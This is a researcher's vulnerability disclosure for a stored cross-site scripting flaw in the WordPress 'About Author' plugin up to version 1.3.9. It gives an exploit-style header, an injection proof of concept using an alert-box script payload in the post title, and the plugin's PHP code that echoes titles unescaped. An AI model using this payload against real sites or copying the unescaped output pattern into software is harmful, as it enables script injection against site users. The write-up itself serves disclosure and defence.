Post

Wordpress About Author <= 1.3.9 Authenticated Stored XSS

Posted
By Lucian Nitescu 3 min read

Wordpress About Author <= 1.3.9 Authenticated Stored XSS

A vulnerability has been identified in the WordPress “About Author” plugin versions lower than or equal to 1.3.9. This plugin is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability. This means that an attacker with a valid account on the WordPress website could inject malicious code into the plugin, which could be executed whenever a user views the affected page. This can lead to various malicious actions such as stealing sensitive user information, spreading malware, or taking control of the affected website. It is recommended to update the plugin to its latest version as soon as possible to prevent any potential attacks.

Intial submission of the vulnerability

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

# Exploit Title: Wordpress About Author <= 1.3.9 Authenticated Stored XSS Vulnerability
# Date: 25-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://weblizar.com/plugins/about-author-pro/
# Software Link: https://wordpress.org/plugins/about-author/
# Version: 1.3.9
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress About Author plugin with a version lower or equal with 1.3.9 is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Stored Cross-site scripting (XSS)
- Using an Wordpress user, access < your_target > /wp-admin/post-new.php?post_type=about_author (About Author > Add new)
- Insert in post_title input the following payload: `"><script>alert(1)</script>`
- Save. The Stored Cross-site scripting (XSS) vulnerability is affecting all pages/routes within the Wordpress Admin panel.

Stored response output:
```
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```

Detailed analysis of the vulnerability

By going within the admin panel at About Author > Add new, we can add the following payload "><script>alert(1)</script>. This is not the issue; XSS vulnerabilities are mainly output-related issues. Therefore, by looking at /wp-content/plugins/about-author at lines 335-353, we can observe the following unescaped output of user-supplied data on line 345 that leads to the stored XSS by outputting database stored data.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

<div id="AMSA" style="display:none;">
	<?php $all_posts = wp_count_posts( 'about_author')->publish;
	if(!$all_posts==null) {?>
	<h3><?php esc_html_e('Select About Author Shortcode And Widget To Insert Into Post','WL_ABTM_TXT_DM');?></h3>
	<select id="Ab_Tm_ME">
		<?php
		global $wpdb;
		$A_B_T_shortcodegallerys = $wpdb->get_results("SELECT post_title, ID FROM $wpdb->posts WHERE post_status = 'publish'	AND post_type='about_author' ");
		foreach ($A_B_T_shortcodegallerys as $A_B_T_shortcodegallery) {
			if($A_B_T_shortcodegallery->post_title) { $title_var=$A_B_T_shortcodegallery->post_title;} else { $title_var="(no title)"; }
			echo "<option value='".$A_B_T_shortcodegallery->ID."'>".$title_var."</option>";
		} ?>
	</select>
	<button class='button primary' id='Ab_tm_insert'><?php esc_html_e('Insert About Author Shortcode','WL_ABTM_TXT_DM');?></button>
	<?php } else { ?>
		<h1 align="center"> <?php esc_html_e( 'No About Author Shortcode not_found ', 'WL_ABTM_TXT_DM' ); ?> </h1><?php
	}
	?>
</div>

The successful exploitation of the vulnerability looks as follows in the HTML output:

1
2
3
4
5
6
7

<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>

Note that, due to the style="display:none;" of the div tag, the vulnerability was available on all pages of the WordPress Admin panel. Keep in mind that "><script>alert(1)</script> will be executed regardless of the style="display:none;".

How to fix

Update to the latest available version of the About Author plugin.

Public appearances

  • https://plugins.svn.wordpress.org/about-author/trunk/readme.txt

Other references

  • https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-about-author-cross-site-scripting-1-3-9/
dctf, ctf, writeups
DCTF DefCamp 2017 writeups CTF challange
This post is licensed under CC BY 4.0 by the author.